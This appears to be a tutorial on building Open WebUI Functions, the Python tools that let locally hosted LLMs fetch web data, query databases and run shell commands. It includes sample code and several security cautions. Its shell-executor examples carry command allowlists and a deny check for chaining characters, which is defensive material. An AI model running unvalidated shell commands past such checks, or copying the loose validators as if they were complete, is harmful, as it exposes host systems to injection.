TL;DR
Open WebUI Functions transform your local LLM from a simple chat interface into a programmable AI platform with real-world capabilities. Functions are Python-based tools that execute during conversations, letting your models query databases, scrape websites, call external APIs, or interact with local services – all without sending data to cloud providers.
Think of Functions as middleware between your LLM and the outside world. When you ask your model to check current weather, fetch documentation, or query a PostgreSQL database, Functions handle the actual execution while the LLM orchestrates the logic. This architecture keeps your sensitive data local while extending AI capabilities beyond text generation.
The Functions system uses a straightforward Python structure with decorators and type hints. You write a function, define its parameters, and Open WebUI automatically generates the interface for your LLM to call it. The platform includes a built-in editor, testing console, and marketplace where community members share pre-built integrations for tools like Jira, GitHub, Home Assistant, and Elasticsearch.
Common use cases include web scraping with BeautifulSoup or Playwright, executing SQL queries against local databases, calling REST APIs for real-time data, reading local file systems, and triggering automation workflows. Functions can also validate LLM outputs before execution – critical when models generate shell commands or database queries.
Caution: Always validate AI-generated commands before production use. Functions execute with the permissions of your Open WebUI container, so a poorly designed function or malicious prompt could access sensitive files or make destructive API calls. Use read-only database connections where possible, implement rate limiting for external APIs, and test thoroughly in isolated environments.
This guide covers function development from scratch, debugging techniques, security considerations, and practical examples that work with Ollama-hosted models like llama3.2, mistral, and codellama running on your local infrastructure.
Understanding Open WebUI Functions Architecture
Open WebUI Functions operate as Python-based extensions that execute within the Open WebUI container environment. Unlike traditional chatbot interfaces that simply relay prompts to language models, Functions transform Open WebUI into a programmable platform where LLMs can trigger real code execution, query databases, call external APIs, and manipulate data structures.
When you enable a Function in Open WebUI, it registers as an available tool that the LLM can invoke during conversations. The execution flow works like this: your prompt reaches the language model, which decides whether to call a Function based on its description and parameters. If triggered, Open WebUI executes the Python code in an isolated environment, captures the output, and feeds it back to the LLM for interpretation and response generation.
This architecture enables practical integrations like querying PostgreSQL databases for customer records, scraping current weather data from APIs, or executing system commands to check server status. For example, a Function might use the requests library to fetch real-time cryptocurrency prices from CoinGecko’s API, parse the JSON response, and return formatted data that the LLM incorporates into its answer.
Security Considerations
Functions execute with the same permissions as the Open WebUI container. This means they can access mounted volumes, network resources, and any credentials stored in environment variables. Before deploying Functions in production environments, carefully audit the code for command injection vulnerabilities, especially when Functions accept user input that gets passed to shell commands or database queries.
Caution: Always validate AI-generated Function code before enabling it. LLMs can hallucinate package names, use deprecated APIs, or generate code with security flaws. Test Functions in isolated development environments first, verify all external dependencies exist, and review network calls to ensure they target legitimate endpoints.
Creating Your First Custom Function
Open WebUI Functions are Python-based tools that execute within your self-hosted environment, allowing LLMs to interact with external systems. The simplest way to start is creating a function that fetches real-time data your model cannot access through training alone.
Navigate to Settings > Functions in your Open WebUI instance and click “Create New Function”. Every function requires three core components: metadata, input validation, and execution logic.
"""
title: Weather Data Fetcher
author: your-name
version: 0.1.0
"""
class Tools:
def __init__(self):
self.citation = True
def get_weather(self, city: str) -> str:
"""
Fetch current weather for a city
:param city: City name
:return: Weather information
"""
import requests
# Using wttr.in free weather API
url = f"https://wttr.in/{city}?format=3"
response = requests.get(url)
if response.status_code == 200:
return response.text
return f"Could not fetch weather for {city}"
This function enables your local LLM to answer “What’s the weather in Denver?” by making an actual API call. The model recognizes the function signature and calls it automatically when appropriate.
Testing and Validation
After saving, test the function in a new chat. Ask your model a weather question and observe the function execution in the response metadata. Open WebUI displays function calls with their parameters and return values.
Critical security note: Functions execute with the permissions of your Open WebUI container. Never allow LLMs to generate shell commands or SQL queries that run unvalidated. Always sanitize inputs and use parameterized queries for database operations. Consider running Open WebUI in a restricted Docker network that limits outbound connections to only necessary services.
For production deployments, wrap external API calls in try-except blocks and implement rate limiting to prevent abuse if your instance serves multiple users.
Advanced Function Development Patterns
Functions can maintain state between invocations using class-based implementations. This pattern enables multi-step workflows where the LLM builds context across multiple interactions.
class DatabaseQueryFunction:
def __init__(self):
self.connection_pool = {}
self.query_history = []
def __call__(self, connection_string: str, query: str,
__user__: dict = {}) -> str:
user_id = __user__.get("id", "anonymous")
if user_id not in self.connection_pool:
self.connection_pool[user_id] = self.create_connection(
connection_string
)
self.query_history.append({
"user": user_id,
"query": query,
"timestamp": time.time()
})
return self.execute_query(
self.connection_pool[user_id],
query
)
This approach isolates user sessions while preserving connection efficiency. The __user__ parameter provides authentication context automatically injected by Open WebUI.
Error Handling and Validation Layers
Production functions require robust validation before executing AI-generated commands. Implement allowlists for dangerous operations:
def safe_shell_executor(command: str) -> str:
allowed_commands = ["ls", "cat", "grep", "find"]
base_command = command.split()[0]
if base_command not in allowed_commands:
return f"Command '{base_command}' not permitted"
if any(char in command for char in [";", "|", "&", "`"]):
return "Command chaining not allowed"
try:
result = subprocess.run(
command.split(),
capture_output=True,
text=True,
timeout=5
)
return result.stdout
except subprocess.TimeoutExpired:
return "Command execution timeout"
Caution: Never execute AI-generated shell commands without validation. LLMs can hallucinate dangerous operations or be manipulated through prompt injection. Always implement timeouts, resource limits, and command allowlists before deploying functions that interact with system resources or external services.
Async Operations for External APIs
For functions calling external services, use async patterns to prevent blocking Open WebUI:
import asyncio
import aiohttp
async def fetch_api_data(endpoint: str, api_key: str) -> str:
async with aiohttp.ClientSession() as session:
headers = {"Authorization": f"Bearer {api_key}"}
async with session.get(endpoint, headers=headers) as response:
return await response.text()
Installing and Using Marketplace Functions
Open WebUI includes a community-driven marketplace where developers share pre-built functions you can install directly into your instance. These functions extend your local LLMs with capabilities like web search, code execution, and API integrations without writing code from scratch.
Navigate to the Admin Panel in your Open WebUI instance, then select Functions from the sidebar. Click the marketplace icon to browse available functions. The marketplace displays functions with descriptions, author information, and installation counts. Popular functions include web scrapers, calculator tools, and database query interfaces.
Installing a Function
To install a marketplace function, click the function card and review its code in the preview window. Always examine the Python code before installation – marketplace functions execute on your server with the same permissions as Open WebUI. Look for suspicious network calls, file system operations, or credential handling.
Click Install to add the function to your workspace. Enable it by toggling the activation switch, then assign it to specific models or make it globally available.
Testing Installed Functions
After installation, start a new chat and reference the function by name. For example, if you installed a web search function called “search_web”, prompt your model with:
Search the web for recent developments in llama.cpp optimization
The LLM will recognize the available function and invoke it automatically, returning results within the chat context.
Security Considerations
Marketplace functions run arbitrary Python code on your host system. Treat them like any third-party software – review the source, check for hardcoded credentials, and test in isolated environments first. Functions that make external API calls may leak conversation context to third-party services. For production deployments, fork marketplace functions to your own repository and audit changes before updating.
Debugging and Testing Functions Locally
Testing functions before deploying them to your Open WebUI instance prevents runtime errors and unexpected behavior during live conversations. The development workflow differs from typical Python debugging because functions execute within Open WebUI’s sandboxed environment.
Create a standalone test script that mimics Open WebUI’s function execution context. This approach catches errors before deployment:
# test_function.py
import requests
import json
def scrape_documentation(url: str) -> dict:
"""Your actual function code"""
response = requests.get(url, timeout=10)
return {"content": response.text[:500], "status": response.status_code}
# Test execution
if __name__ == "__main__":
result = scrape_documentation("https://docs.python.org")
print(json.dumps(result, indent=2))
Run tests outside Docker to verify logic, then deploy to Open WebUI running on port 3000 (mapped from container port 8080).
Debugging Within Open WebUI
Enable verbose logging by checking function execution results in the chat interface. Open WebUI displays function return values directly in conversations, making it easy to spot malformed responses.
Add explicit error handling and logging to your functions:
def query_database(query: str) -> dict:
try:
# Database logic here
return {"success": True, "rows": results}
except Exception as e:
return {"success": False, "error": str(e), "query": query}
Validation for AI-Generated Commands
CAUTION: Never execute shell commands or database queries generated by LLMs without validation. Functions that accept AI-generated input should implement strict allowlists:
ALLOWED_COMMANDS = ["ls", "pwd", "date"]
def safe_shell(command: str) -> dict:
cmd = command.split()[0]
if cmd not in ALLOWED_COMMANDS:
return {"error": "Command not allowed"}
# Execute only after validation
Test functions with malicious inputs during development. Assume the LLM will eventually generate unexpected parameters, especially when processing user requests that involve system operations or external API calls.
Installation and Configuration Steps
Before developing Functions, ensure Open WebUI is running with proper Python environment support. The standard Docker deployment includes Python 3.11 and pip, but Functions require additional configuration for external dependencies.
Start Open WebUI with volume mounts for persistent function storage:
docker run -d -p 3000:8080 \
-v open-webui:/app/backend/data \
--name open-webui \
ghcr.io/open-webui/open-webui:main
Access the interface at http://localhost:3000 and navigate to Admin Panel > Settings > Functions. Enable the Functions feature toggle – this activates the Python execution environment within the container.
Installing Function Dependencies
Functions execute in an isolated environment. Install packages through the Functions interface or by accessing the container shell:
docker exec -it open-webui pip install requests beautifulsoup4 psycopg2-binary
Common dependencies for integration work include requests for API calls, beautifulsoup4 for web scraping, and database drivers like psycopg2-binary for PostgreSQL connections. Install only what your Functions require to minimize attack surface.
Creating Your First Function
Navigate to Workspace > Functions > Create New Function. The editor provides a Python template with required structure:
class Tools:
def __init__(self):
pass
def get_weather(self, city: str) -> str:
"""Fetch current weather for a city"""
# Function implementation
pass
Functions must define a Tools class with methods that accept typed parameters and return strings or structured data. The LLM automatically detects available functions through docstrings and type hints.
Caution: Functions execute with container privileges. Validate all user inputs and sanitize data before making external API calls or database queries. Never execute AI-generated shell commands without manual review, especially when Functions interact with production systems or sensitive data sources.
